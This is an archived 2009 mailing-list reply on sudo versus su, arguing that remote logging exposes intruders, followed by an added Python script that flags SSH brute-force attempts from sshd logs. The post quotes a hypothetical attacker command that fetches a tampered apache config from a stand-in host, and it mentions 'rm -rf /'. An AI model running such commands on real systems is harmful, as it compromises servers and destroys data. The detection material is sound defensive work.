[Leaplist] sudo vs su

Richard F. Ostrow Jr. rich at warfaresdl.com
Mon Jun 1 13:36:58 EDT 2009


Jim,

For whatever reason, I never got your post (taken from Kevin's reply).

At any rate, as far as remote logging goes, it's more than just to track
what you or your authorized users are doing - it's for tracking what
remote attackers are doing and preventing them from covering their tracks.
Sure, you probably wouldn't do anything as stupid as an "rm -rf /"... but
would you do a "cd /usr/local/etc/apache2/ && wget
http://somecracker.net/compromisedapacheconfs/httpd.conf &&
/usr/local/etc/rc.d/apache2 restart"? You may not even see it happen.
Granted, you probably wouldn't even with remote logging (unless you
regularly check), but they can always wipe their activity from the log.

I state this because I was recently compromised with a 2-month-old build
of apache2. The hackers were not very sophisticated (did not cover their
tracks), and never got root access (everything was done as the www user), but
it got me thinking about securing my boxes and how to adapt to various
attacks (like locking out an IP address at the firewall level at a single
failed SSH login - prevents brute force attacks, and if I lock myself out,
I log in from another server somewhere (sf.net, for instance) and reset
it). It also tends to block people who inadvertently became a part of
botnets or similar when I get distributed brute force attacks (my logs do
show as much, as I had at one point 250 login attempts for a single
(nonexistent) user from 250 different IP addresses in under 1 minute). I
also lock IP addresses out for other abuses (excessive connection attempts
on any port, for instance... haven't gotten into trouble with this one
(yet)).

Jim Hartley wrote:
> Remote logging system???? I don't have a remote logging system. I have
> just my one desktop machine here. In that context, does "sudo" have any
> advantages? I am assuming that **I** am not going to do something stupid
> like "rm -rf /"
>
> Jim Hartley
>
> Richard F. Ostrow Jr. wrote:
>> Ok, now that we're actually talking in the right topic, here's the
>> _correct_ answer.
>>
>> su - input not logged, difficult to backtrace what was done in the
>> event of a catastrophic screwup (rm -rf /)
>>
>> sudo - can easily track what was done. Everything put into sudo goes
>> into /var/log/{hostname}/messages of the remote logging system. An
>> 'rm -rf /' would be logged on the remote machine, and I would know
>> *exactly* who was stupid enough to do such a thing, and can make them
>> clean up the mess.
>>
>> I wonder which one is better from an SA standpoint?
>>
>>
>

-- 
Life without passion is death in disguise
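As an added example, not part of the original thread or of Richard's own setup, the following script applies the two detections described in the message above to sshd log lines: block a source address at its first failed SSH login (with an allowlist for the box you would use to get back in if you lock yourself out), and flag a distributed brute force where many distinct addresses hit one username inside a short window. The log lines, hostname and IP addresses are constructed for the example; the log year, the pf table name and the allowlisted address are assumptions.

```python
"""Failed-SSH-login detection over sshd syslog lines.

Example code added to this archive page; it is not from the original
thread.  SAMPLE_LOG below is constructed, not taken from a real host.
"""
import ipaddress
import re
from collections import defaultdict
from datetime import datetime

# OpenSSH failure messages as they appear behind a classic syslog prefix.
# Classic syslog timestamps carry no year, so one is assumed here.
ASSUMED_YEAR = 2009
SSHD_FAIL = re.compile(
    r"^(?P<mon>\w{3})\s+(?P<day>\d{1,2}) (?P<hms>\d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed (?:password|publickey|none) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+ ssh2$"
)

# Constructed sample: one legitimate login, three addresses hammering a
# nonexistent user within seconds, one root attempt, one straggler later.
SAMPLE_LOG = """\
Jun  1 13:20:01 host sshd[1234]: Accepted publickey for rich from 192.0.2.10 port 50000 ssh2
Jun  1 13:20:05 host sshd[1235]: Failed password for invalid user oracle from 198.51.100.7 port 40001 ssh2
Jun  1 13:20:06 host sshd[1236]: Failed password for invalid user oracle from 198.51.100.8 port 40002 ssh2
Jun  1 13:20:07 host sshd[1237]: Failed password for invalid user oracle from 198.51.100.9 port 40003 ssh2
Jun  1 13:20:30 host sshd[1238]: Failed password for root from 203.0.113.5 port 40004 ssh2
Jun  1 13:25:00 host sshd[1239]: Failed password for invalid user oracle from 198.51.100.10 port 40005 ssh2
"""


def parse_failures(text):
    """Return a list of (timestamp, user, ip) for every failed-login line."""
    out = []
    for line in text.splitlines():
        m = SSHD_FAIL.match(line)
        if not m:
            continue  # accepted logins and unrelated daemons are skipped
        ts = datetime.strptime(
            f"{ASSUMED_YEAR} {m['mon']} {m['day']} {m['hms']}", "%Y %b %d %H:%M:%S"
        )
        out.append((ts, m["user"], m["ip"]))
    return out


def ips_to_block(failures, allowlist=frozenset()):
    """Policy from the post: a single failure is enough to block the source.

    allowlist holds addresses never to block, e.g. the remote server you
    would log in from to undo a self-lockout (assumed address in __main__).
    """
    ips = {ip for _, _, ip in failures if ip not in allowlist}
    return sorted(ips, key=ipaddress.ip_address)


def distributed_bruteforce(failures, window_seconds=60, min_sources=3):
    """Map user -> max number of distinct source IPs seen for that user
    inside any window_seconds interval, keeping only users at or above
    min_sources.  This is the '250 IPs, one user, under a minute' pattern."""
    by_user = defaultdict(list)
    for ts, user, ip in failures:
        by_user[user].append((ts, ip))
    hits = {}
    for user, events in by_user.items():
        events.sort()
        best, lo = 0, 0
        for hi in range(len(events)):
            # slide the window start forward until it fits window_seconds
            while (events[hi][0] - events[lo][0]).total_seconds() > window_seconds:
                lo += 1
            best = max(best, len({ip for _, ip in events[lo:hi + 1]}))
        if best >= min_sources:
            hits[user] = best
    return hits


def pf_table_commands(ips, table="sshbrute"):
    """Render block decisions as pfctl commands (FreeBSD, which the
    /usr/local/etc/rc.d path in the post suggests).  The table name is an
    assumption; the commands are returned as strings, not executed."""
    return [f"pfctl -t {table} -T add {ip}" for ip in ips]


if __name__ == "__main__":
    failures = parse_failures(SAMPLE_LOG)
    print("block:", ips_to_block(failures, allowlist={"192.0.2.10"}))
    print("distributed:", distributed_bruteforce(failures))
    print("\n".join(pf_table_commands(ips_to_block(failures))))
```

Feed it the output of `grep sshd /var/log/auth.log` (or the remote syslog copy, which is the point of the thread: an attacker who wipes the local log cannot touch the one on the loghost). The one-strike policy is exactly as aggressive as the post describes, so the allowlist matters: put the address you would recover from in it before wiring the pfctl output to a cron job.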

